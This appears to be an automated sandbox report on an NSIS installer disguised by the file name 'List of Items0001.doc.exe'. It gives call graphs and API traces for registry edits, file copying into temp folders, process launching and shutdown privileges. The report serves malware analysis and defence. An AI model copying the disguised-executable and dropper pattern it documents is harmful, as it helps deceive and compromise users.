5709 404860 GetSysColor 5708->5709 5710 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5708->5710 5709->5710 5710->5695 5711->5706 5712->5708 5713->5699 5715 404a21 SendMessageW 5714->5715 5716 404a1c 5714->5716 5715->5682 5716->5715 5720 405c8e ShellExecuteExW 5717->5720 5719 404998 LoadCursorW SetCursor 5719->5688 5720->5719 5721 402383 5722 40238a 5721->5722 5725 40239d 5721->5725 5723 4066a5 17 API calls 5722->5723 5724 402397 5723->5724 5724->5725 5726 405cc8 MessageBoxIndirectW 5724->5726 5726->5725 5727 402c05 SendMessageW 5728 402c2a 5727->5728 5729 402c1f InvalidateRect 5727->5729 5729->5728 4907 405809 4908 4059b3 4907->4908 4909 40582a GetDlgItem GetDlgItem GetDlgItem 4907->4909 4911 4059e4 4908->4911 4912 4059bc GetDlgItem CreateThread CloseHandle 4908->4912 4953 4045f9 SendMessageW 4909->4953 4913 405a0f 4911->4913 4915 405a34 4911->4915 4916 4059fb ShowWindow ShowWindow 4911->4916 4912->4911 4956 40579d 5 API calls 4912->4956 4917 405a1b 4913->4917 4919 405a6f 4913->4919 4914 40589a 4918 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4914->4918 4923 40462b 8 API calls 4915->4923 4955 4045f9 SendMessageW 4916->4955 4921 405a23 4917->4921 4922 405a49 ShowWindow 4917->4922 4924 4058f3 SendMessageW SendMessageW 4918->4924 4925 40590f 4918->4925 4919->4915 4926 405a7d SendMessageW 4919->4926 4927 40459d SendMessageW 4921->4927 4929 405a69 4922->4929 4930 405a5b 4922->4930 4928 405a42 4923->4928 4924->4925 4931 405922 4925->4931 4932 405914 SendMessageW 4925->4932 4926->4928 4933 405a96 CreatePopupMenu 4926->4933 4927->4915 4935 40459d SendMessageW 4929->4935 4934 4056ca 24 API calls 4930->4934 4937 4045c4 18 API calls 4931->4937 4932->4931 4936 4066a5 17 API calls 4933->4936 4934->4929 4935->4919 4938 405aa6 AppendMenuW 4936->4938 4939 405932 4937->4939 4940 405ac3 GetWindowRect 4938->4940 4941 405ad6 TrackPopupMenu 4938->4941 4942 40593b ShowWindow 4939->4942 4943 40596f GetDlgItem SendMessageW 4939->4943 4940->4941 4941->4928 4944 405af1 4941->4944 4945 405951 ShowWindow 4942->4945 4948 40595e 4942->4948 4943->4928 4946 405996 SendMessageW SendMessageW 4943->4946 4947 405b0d SendMessageW 4944->4947 4945->4948 4946->4928 4947->4947 4949 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4947->4949 4954 4045f9 SendMessageW 4948->4954 4951 405b4f SendMessageW 4949->4951 4951->4951 4952 405b78 GlobalUnlock SetClipboardData CloseClipboard 4951->4952 4952->4928 4953->4914 4954->4943 4955->4913 4957 6db62a7f 4958 6db62acf 4957->4958 4959 6db62a8f VirtualProtect 4957->4959 4959->4958 4977 40248a 4978 402da6 17 API calls 4977->4978 4979 40249c 4978->4979 4980 402da6 17 API calls 4979->4980 4981 4024a6 4980->4981 4994 402e36 4981->4994 4984 402c2a 4985 4024de 4989 4024ea 4985->4989 4998 402d84 4985->4998 4986 402da6 17 API calls 4990 4024d4 lstrlenW 4986->4990 4988 402509 RegSetValueExW 4992 40251f RegCloseKey 4988->4992 4989->4988 4991 403371 44 API calls 4989->4991 4990->4985 4991->4988 4992->4984 4995 402e51 4994->4995 5001 406503 4995->5001 4999 4066a5 17 API calls 4998->4999 5000 402d99 4999->5000 5000->4989 5002 406512 5001->5002 5003 4024b6 5002->5003 5004 40651d RegCreateKeyExW 5002->5004 5003->4984 5003->4985 5003->4986 5004->5003 5730 404e0b 5731 404e37 5730->5731 5732 404e1b 5730->5732 5734 404e6a 5731->5734 5735 404e3d SHGetPathFromIDListW 5731->5735 5741 405cac GetDlgItemTextW 5732->5741 5737 404e54 SendMessageW 5735->5737 5738 404e4d 5735->5738 5736 404e28 SendMessageW 5736->5731 5737->5734 5740 40140b 2 API calls 5738->5740 5740->5737 5741->5736 5742 40290b 5743 402da6 17 API calls 5742->5743 5744 402912 FindFirstFileW 5743->5744 5745 402925 5744->5745 5746 40293a 5744->5746 5747 402943 5746->5747 5750 4065af wsprintfW 5746->5750 5751 406668 lstrcpynW 5747->5751 5750->5747 5751->5745 5752 40190c 5753 401943 5752->5753 5754 402da6 17 API calls 5753->5754 5755 401948 5754->5755 5756 405d74 67 API calls 5755->5756 5757 401951 5756->5757 5758 40190f 5759 402da6 17 API calls 5758->5759 5760 401916 5759->5760 5761 405cc8 MessageBoxIndirectW 5760->5761 5762 40191f 5761->5762 5763 6db61979 5765 6db6199c 5763->5765 5764 6db619e3 5767 6db61312 2 API calls 5764->5767 5765->5764 5766 6db619d1 GlobalFree 5765->5766 5766->5764 5768 6db61b6e GlobalFree GlobalFree 5767->5768 5071 402891 5072 402898 5071->5072 5073 402ba9 5071->5073 5074 402d84 17 API calls 5072->5074 5075 40289f 5074->5075 5076 4028ae SetFilePointer 5075->5076 5076->5073 5077 4028be 5076->5077 5079 4065af wsprintfW 5077->5079 5079->5073 5769 401491 5770 4056ca 24 API calls 5769->5770 5771 401498 5770->5771 5772 401f12 5773 402da6 17 API calls 5772->5773 5774 401f18 5773->5774 5775 402da6 17 API calls 5774->5775 5776 401f21 5775->5776 5777 402da6 17 API calls 5776->5777 5778 401f2a 5777->5778 5779 402da6 17 API calls 5778->5779 5780 401f33 5779->5780 5781 401423 24 API calls 5780->5781 5782 401f3a 5781->5782 5789 405c8e ShellExecuteExW 5782->5789 5784 401f82 5785 406ae0 5 API calls 5784->5785 5786 40292e 5784->5786 5787 401f9f CloseHandle 5785->5787 5787->5786 5789->5784 5790 402f93 5791 402fa5 SetTimer 5790->5791 5792 402fbe 5790->5792 5791->5792 5793 40300c 5792->5793 5794 403012 MulDiv 5792->5794 5795 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 5794->5795 5795->5793 5811 6db610e1 5817 6db61111 5811->5817 5812 6db612b0 GlobalFree 5813 6db611d7 GlobalAlloc 5813->5817 5814 6db61240 GlobalFree 5814->5817 5815 6db6135a 2 API calls 5815->5817 5816 6db612ab 5816->5812 5817->5812 5817->5813 5817->5814 5817->5815 5817->5816 5818 6db61312 2 API calls 5817->5818 5819 6db6129a GlobalFree 5817->5819 5820 6db6116b GlobalAlloc 5817->5820 5821 6db61381 lstrcpyW 5817->5821 5818->5817 5819->5817 5820->5817 5821->5817 5822 401d17 5823 402d84 17 API calls 5822->5823 5824 401d1d IsWindow 5823->5824 5825 401a20 5824->5825 5826 401b9b 5827 401ba8 5826->5827 5828 401bec 5826->5828 5829 401c31 5827->5829 5834 401bbf 5827->5834 5830 401bf1 5828->5830 5831 401c16 GlobalAlloc 5828->5831 5832 4066a5 17 API calls 5829->5832 5839 40239d 5829->5839 5830->5839 5847 406668 lstrcpynW 5830->5847 5833 4066a5 17 API calls 5831->5833 5836 402397 5832->5836 5833->5829 5845 406668 lstrcpynW 5834->5845 5836->5839 5840 405cc8 MessageBoxIndirectW 5836->5840 5838 401c03 GlobalFree 5838->5839 5840->5839 5841 401bce 5846 406668 lstrcpynW 5841->5846 5843 401bdd 5848 406668 lstrcpynW 5843->5848 5845->5841 5846->5843 5847->5838 5848->5839 5849 40261c 5850 402da6 17 API calls 5849->5850 5851 402623 5850->5851 5854 406158 GetFileAttributesW CreateFileW 5851->5854 5853 40262f 5854->5853 5336 40259e 5337 402de6 17 API calls 5336->5337 5338 4025a8 5337->5338 5339 402d84 17 API calls 5338->5339 5340 4025b1 5339->5340 5341 4025c0 5340->5341 5345 40292e 5340->5345 5342 4025d9 RegEnumValueW 5341->5342 5343 4025cd RegEnumKeyW 5341->5343 5344 4025ee 5342->5344 5346 4025f5 RegCloseKey 5342->5346 5343->5346 5344->5346 5346->5345 5862 40149e 5863 4014ac PostQuitMessage 5862->5863 5864 40239d 5862->5864 5863->5864 5865 6db623e9 5866 6db62453 5865->5866 5867 6db6245e GlobalAlloc 5866->5867 5868 6db6247d 5866->5868 5867->5866 4786 4015a3 4787 402da6 17 API calls 4786->4787 4788 4015aa SetFileAttributesW 4787->4788 4789 4015bc 4788->4789 4790 401fa4 4791 402da6 17 API calls 4790->4791 4792 401faa 4791->4792 4793 4056ca 24 API calls 4792->4793 4794 401fb4 4793->4794 4795 405c4b 2 API calls 4794->4795 4796 401fba 4795->4796 4797 401fdd CloseHandle 4796->4797 4800 40292e 4796->4800 4805 406ae0 WaitForSingleObject 4796->4805 4797->4800 4801 401fcf 4802 401fd4 4801->4802 4803 401fdf 4801->4803 4810 4065af wsprintfW 4802->4810 4803->4797 4806 406afa 4805->4806 4807 406b0c GetExitCodeProcess 4806->4807 4808 406a71 2 API calls 4806->4808 4807->4801 4809 406b01 WaitForSingleObject 4808->4809 4809->4806 4810->4797 4960 40252a 4971 402de6 4960->4971 4963 402da6 17 API calls 4964 40253d 4963->4964 4965 402548 RegQueryValueExW 4964->4965 4966 40292e 4964->4966 4967 402568 4965->4967 4970 40256e RegCloseKey 4965->4970 4967->4970 4976 4065af wsprintfW 4967->4976 4970->4966 4972 402da6 17 API calls 4971->4972 4973 402dfd 4972->4973 4974 4064d5 RegOpenKeyExW 4973->4974 4975 402534 4974->4975 4975->4963 4976->4970 5869 40202a 5870 402da6 17 API calls 5869->5870 5871 402031 5870->5871 5872 406a35 5 API calls 5871->5872 5873 402040 5872->5873 5874 4020cc 5873->5874 5875 40205c GlobalAlloc 5873->5875 5875->5874 5876 402070 5875->5876 5877 406a35 5 API calls 5876->5877 5878 402077 5877->5878 5879 406a35 5 API calls 5878->5879 5880 402081 5879->5880 5880->5874 5884 4065af wsprintfW 5880->5884 5882 4020ba 5885 4065af wsprintfW 5882->5885 5884->5882 5885->5874 5886 4021aa 5887 402da6 17 API calls 5886->5887 5888 4021b1 5887->5888 5889 402da6 17 API calls 5888->5889 5890 4021bb 5889->5890 5891 402da6 17 API calls 5890->5891 5892 4021c5 5891->5892 5893 402da6 17 API calls 5892->5893 5894 4021cf 5893->5894 5895 402da6 17 API calls 5894->5895 5896 4021d9 5895->5896 5897 402218 CoCreateInstance 5896->5897 5898 402da6 17 API calls 5896->5898 5901 402237 5897->5901 5898->5897 5899 401423 24 API calls 5900 4022f6 5899->5900 5901->5899 5901->5900 5909 6db61058 5912 6db61074 5909->5912 5910 6db610dd 5911 6db61092 5914 6db615b6 GlobalFree 5911->5914 5912->5910 5912->5911 5913 6db615b6 GlobalFree 5912->5913 5913->5911 5915 6db610a2 5914->5915 5916 6db610b2 5915->5916 5917 6db610a9 GlobalSize 5915->5917 5918 6db610b6 GlobalAlloc 5916->5918 5919 6db610c7 5916->5919 5917->5916 5920 6db615dd 3 API calls 5918->5920 5921 6db610d2 GlobalFree 5919->5921 5920->5919 5921->5910 5922 401a30 5923 402da6 17 API calls 5922->5923 5924 401a39 ExpandEnvironmentStringsW 5923->5924 5925 401a4d 5924->5925 5927 401a60 5924->5927 5926 401a52 lstrcmpW 5925->5926 5925->5927 5926->5927 5928 405031 GetDlgItem GetDlgItem 5929 405083 7 API calls 5928->5929 5935 4052a8 5928->5935 5930 40512a DeleteObject 5929->5930 5931 40511d SendMessageW 5929->5931 5932 405133 5930->5932 5931->5930 5933 40516a 5932->5933 5936 4066a5 17 API calls 5932->5936 5937 4045c4 18 API calls 5933->5937 5934 40538a 5938 405436 5934->5938 5948 4053e3 SendMessageW 5934->5948 5968 40529b 5934->5968 5935->5934 5943 405317 5935->5943 5982 404f7f SendMessageW 5935->5982 5941 40514c SendMessageW SendMessageW 5936->5941 5942 40517e 5937->5942 5939 405440 SendMessageW 5938->5939 5940 405448 5938->5940 5939->5940 5950 405461 5940->5950 5951 40545a ImageList_Destroy 5940->5951 5958 405471 5940->5958 5941->5932 5947 4045c4 18 API calls 5942->5947 5943->5934 5944 40537c SendMessageW 5943->5944 5944->5934 5945 40462b 8 API calls 5949 405637 5945->5949 5962 40518f 5947->5962 5953 4053f8 SendMessageW 5948->5953 5948->5968 5954 40546a GlobalFree 5950->5954 5950->5958 5951->5950 5952 4055eb 5959 4055fd ShowWindow GetDlgItem ShowWindow 5952->5959 5952->5968 5956 40540b 5953->5956 5954->5958 5955 40526a GetWindowLongW SetWindowLongW 5957 405283 5955->5957 5967 40541c SendMessageW 5956->5967 5960 4052a0 5957->5960 5961 405288 ShowWindow 5957->5961 5958->5952 5975 4054ac 5958->5975 5987 404fff 5958->5987 5959->5968 5981 4045f9 SendMessageW 5960->5981 5980 4045f9 SendMessageW 5961->5980 5962->5955 5963 405265 5962->5963 5966 4051e2 SendMessageW 5962->5966 5969 405220 SendMessageW 5962->5969 5970 405234 SendMessageW 5962->5970 5963->5955 5963->5957 5966->5962 5967->5938 5968->5945 5969->5962 5970->5962 5972 4055b6 5973 4055c1 InvalidateRect 5972->5973 5977 4055cd 5972->5977 5973->5977 5974 4054da SendMessageW 5976 4054f0 5974->5976 5975->5974 5975->5976 5976->5972 5978 405564 SendMessageW SendMessageW 5976->5978 5977->5952 5996 404f3a 5977->5996 5978->5976 5980->5968 5981->5935 5983 404fa2 GetMessagePos ScreenToClient SendMessageW 5982->5983 5984 404fde SendMessageW 5982->5984 5985 404fd6 5983->5985 5986 404fdb 5983->5986 5984->5985 5985->5943 5986->5984 5999 406668 lstrcpynW 5987->5999 5989 405012 6000 4065af wsprintfW 5989->6000 5991 40501c 5992 40140b 2 API calls 5991->5992 5993 405025 5992->5993 6001 406668 lstrcpynW 5993->6001 5995 40502c 5995->5975 6002 404e71 5996->6002 5998 404f4f 5998->5952 5999->5989 6000->5991 6001->5995 6003 404e8a 6002->6003 6004 4066a5 17 API calls 6003->6004 6005 404eee 6004->6005 6006 4066a5 17 API calls 6005->6006 6007 404ef9 6006->6007 6008 4066a5 17 API calls 6007->6008 6009 404f0f lstrlenW wsprintfW SetDlgItemTextW 6008->6009 6009->5998 6015 4023b2 6016 4023c0 6015->6016 6017 4023ba 6015->6017 6019 4023ce 6016->6019 6021 402da6 17 API calls 6016->6021 6018 402da6 17 API calls 6017->6018 6018->6016 6020 4023dc 6019->6020 6022 402da6 17 API calls 6019->6022 6023 402da6 17 API calls 6020->6023 6021->6019 6022->6020 6024 4023e5 WritePrivateProfileStringW 6023->6024 5080 402434 5081 402467 5080->5081 5082 40243c 5080->5082 5084 402da6 17 API calls 5081->5084 5083 402de6 17 API calls 5082->5083 5085 402443 5083->5085 5086 40246e 5084->5086 5087 40244d 5085->5087 5090 40247b 5085->5090 5092 402e64 5086->5092 5089 402da6 17 API calls 5087->5089 5091 402454 RegDeleteValueW RegCloseKey 5089->5091 5091->5090 5093 402e71 5092->5093 5094 402e78 5092->5094 5093->5090 5094->5093 5096 402ea9 5094->5096 5097 4064d5 RegOpenKeyExW 5096->5097 5098 402ed7 5097->5098 5099 402ee1 5098->5099 5100 402f8c 5098->5100 5101 402ee7 RegEnumValueW 5099->5101 5110 402f0a 5099->5110 5100->5093 5102 402f71 RegCloseKey 5101->5102 5101->5110 5102->5100 5103 402f46 RegEnumKeyW 5104 402f4f RegCloseKey 5103->5104 5103->5110 5105 406a35 5 API calls 5104->5105 5107 402f5f 5105->5107 5106 402ea9 6 API calls 5106->5110 5108 402f81 5107->5108 5109 402f63 RegDeleteKeyW 5107->5109 5108->5100 5109->5100 5110->5102 5110->5103 5110->5104 5110->5106 6025 404734 lstrlenW 6026 404753 6025->6026 6027 404755 WideCharToMultiByte 6025->6027 6026->6027 6028 401735 6029 402da6 17 API calls 6028->6029 6030 40173c SearchPathW 6029->6030 6031 401757 6030->6031 6032 6db62d43 6033 6db62d5b 6032->6033 6034 6db6162f 2 API calls 6033->6034 6035 6db62d76 6034->6035 6036 404ab5 6037 404ae1 6036->6037 6038 404af2 6036->6038 6097 405cac GetDlgItemTextW 6037->6097 6039 404afe GetDlgItem 6038->6039 6046 404b5d 6038->6046 6042 404b12 6039->6042 6041 404aec 6044 4068ef 5 API calls 6041->6044 6045 404b26 SetWindowTextW 6042->6045 6049 405fe2 4 API calls 6042->6049 6043 404c41 6095 404df0 6043->6095 6099 405cac GetDlgItemTextW 6043->6099 6044->6038 6050 4045c4 18 API calls 6045->6050 6046->6043 6051 4066a5 17 API calls 6046->6051 6046->6095 6048 40462b 8 API calls 6053 404e04 6048->6053 6054 404b1c 6049->6054 6055 404b42 6050->6055 6056 404bd1 SHBrowseForFolderW 6051->6056 6052 404c71 6057 40603f 18 API calls 6052->6057 6054->6045 6061 405f37 3 API calls 6054->6061 6058 4045c4 18 API calls 6055->6058 6056->6043 6059 404be9 CoTaskMemFree 6056->6059 6060 404c77 6057->6060 6062 404b50 6058->6062 6063 405f37 3 API calls 6059->6063 6100 406668 lstrcpynW 6060->6100 6061->6045 6098 4045f9 SendMessageW 6062->6098 6065 404bf6 6063->6065 6068 404c2d SetDlgItemTextW 6065->6068 6072 4066a5 17 API calls 6065->6072 6067 404b56 6070 406a35 5 API calls 6067->6070 6068->6043 6069 404c8e 6071 406a35 5 API calls 6069->6071 6070->6046 6083 404c95 6071->6083 6073 404c15 lstrcmpiW 6072->6073 6073->6068 6075 404c26 lstrcatW 6073->6075 6074 404cd6 6101 406668 lstrcpynW 6074->6101 6075->6068 6077 404cdd 6078 405fe2 4 API calls 6077->6078 6079 404ce3 GetDiskFreeSpaceW 6078->6079 6081 404d07 MulDiv 6079->6081 6084 404d2e 6079->6084 6081->6084 6082 405f83 2 API calls 6082->6083 6083->6074 6083->6082 6083->6084 6085 404d9f 6084->6085 6086 404f3a 20 API calls 6084->6086 6087 404dc2 6085->6087 6089 40140b 2 API calls 6085->6089 6088 404d8c 6086->6088 6102 4045e6 KiUserCallbackDispatcher 6087->6102 6090 404da1 SetDlgItemTextW 6088->6090 6091 404d91 6088->6091 6089->6087 6090->6085 6093 404e71 20 API calls 6091->6093 6093->6085 6094 404dde 6094->6095 6096 404a0e SendMessageW 6094->6096 6095->6048 6096->6095 6097->6041 6098->6067 6099->6052 6100->6069 6101->6077 6102->6094 6103 401d38 6104 402d84 17 API calls 6103->6104 6105 401d3f 6104->6105 6106 402d84 17 API calls 6105->6106 6107 401d4b GetDlgItem 6106->6107 6108 402638 6107->6108 6109 4014b8 6110 4014be 6109->6110 6111 401389 2 API calls 6110->6111 6112 4014c6 6111->6112 6113 40563e 6114 405662 6113->6114 6115 40564e 6113->6115 6117 40566a IsWindowVisible 6114->6117 6123 405681 6114->6123 6116 405654 6115->6116 6125 4056ab 6115->6125 6120 404610 SendMessageW 6116->6120 6118 405677 6117->6118 6117->6125 6121 404f7f 5 API calls 6118->6121 6119 4056b0 CallWindowProcW 6122 40565e 6119->6122 6120->6122 6121->6123 6123->6119 6124 404fff 4 API calls 6123->6124 6124->6125 6125->6119 6126 40263e 6127 402652 6126->6127 6128 40266d 6126->6128 6131 402d84 17 API calls 6127->6131 6129 402672 6128->6129 6130 40269d 6128->6130 6132 402da6 17 API calls 6129->6132 6133 402da6 17 API calls 6130->6133 6134 402659 6131->6134 6135 402679 6132->6135 6136 4026a4 lstrlenW 6133->6136 6139 4026d1 6134->6139 6141 4026e7 6134->6141 6142 406239 5 API calls 6134->6142 6143 40668a WideCharToMultiByte 6135->6143 6136->6134 6138 40268d lstrlenA 6138->6134 6140 40620a WriteFile 6139->6140 6139->6141 6140->6141 6142->6139 6143->6138

                                                Executed Functions

                                                Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 12 403727 5->12 7 403733-403747 call 4069c5 lstrlenA 6->7 13 403749-403765 call 406a35 * 3 7->13 12->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 26 40376f 21->26 26->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 39 403810-403814 36->39 40 403815-403819 36->40 44 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->44 45 40397d-403995 DeleteFileW call 4030d0 37->45 39->40 42 4038d9-4038e7 call 405f64 40->42 43 40381f-403825 40->43 42->32 61 4038e9-4038ea 42->61 47 403827-40382e 43->47 48 40383f-403878 43->48 44->45 64 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 44->64 66 40399b-4039a1 45->66 67 403b6c-403b7a call 403c25 OleUninitialize 45->67 54 403830-403833 47->54 55 403835 47->55 49 403894-4038ce 48->49 50 40387a-40387f 48->50 58 4038d0-4038d4 49->58 59 4038d6-4038d8 49->59 50->49 56 403881-403889 50->56 54->48 54->55 55->48 62 403890 56->62 63 40388b-40388e 56->63 58->59 65 4038f9-403906 call 406668 58->65 59->42 61->32 62->49 63->49 63->62 64->45 64->67 65->37 71 4039a7-4039ba call 405f64 66->71 72 403a48-403a4f call 403d17 66->72 79 403b91-403b97 67->79 80 403b7c-403b8b call 405cc8 ExitProcess 67->80 81 403a0c-403a19 71->81 82 4039bc-4039f1 71->82 78 403a54-403a57 72->78 78->67 84 403b99-403bae GetCurrentProcess OpenProcessToken 79->84 85 403c0f-403c17 79->85 89 403a1b-403a29 call 40603f 81->89 90 403a5c-403a70 call 405c33 lstrcatW 81->90 86 4039f3-4039f7 82->86 92 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 84->92 93 403bdf-403bed call 406a35 84->93 87 403c19 85->87 88 403c1c-403c1f ExitProcess 85->88 94 403a00-403a08 86->94 95 4039f9-4039fe 86->95 87->88 89->67 105 403a2f-403a45 call 406668 * 2 89->105 103 403a72-403a78 lstrcatW 90->103 104 403a7d-403a97 lstrcatW lstrcmpiW 90->104 92->93 106 403bfb-403c06 ExitWindowsEx 93->106 107 403bef-403bf9 93->107 94->86 99 403a0a 94->99 95->94 95->99 99->81 103->104 109 403b6a 104->109 110 403a9d-403aa0 104->110 105->72 106->85 108 403c08-403c0a call 40140b 106->108 107->106 107->108 108->85 109->67 114 403aa2-403aa7 call 405b99 110->114 115 403aa9 call 405c16 110->115 121 403aae-403abe SetCurrentDirectoryW 114->121 115->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 133 403b63-403b65 call 406428 131->133 132->131 134 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->134 133->109 134->131 142 403b4d-403b54 CloseHandle 134->142 142->131
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                • OleInitialize.OLE32(00000000), ref: 0040377D
                                                • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000020,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000), ref: 004037E9
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A69
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A78
                                                  • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A83
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A8F
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\List of Items0001.doc.exe,00420F08,00000001), ref: 00403B21
                                                • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                • OleUninitialize.OLE32(?), ref: 00403B71
                                                • ExitProcess.KERNEL32 ref: 00403B8B
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                • ExitProcess.KERNEL32 ref: 00403C1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: "C:\Users\user\Desktop\List of Items0001.doc.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$C:\Users\user\Desktop$C:\Users\user\Desktop\List of Items0001.doc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-43755930
                                                • Opcode ID: 7661b2740962a4f112584f7e598b5b298a42e845d6f3323427e92d6f86dfce5e
                                                • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                • Opcode Fuzzy Hash: 7661b2740962a4f112584f7e598b5b298a42e845d6f3323427e92d6f86dfce5e
                                                • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
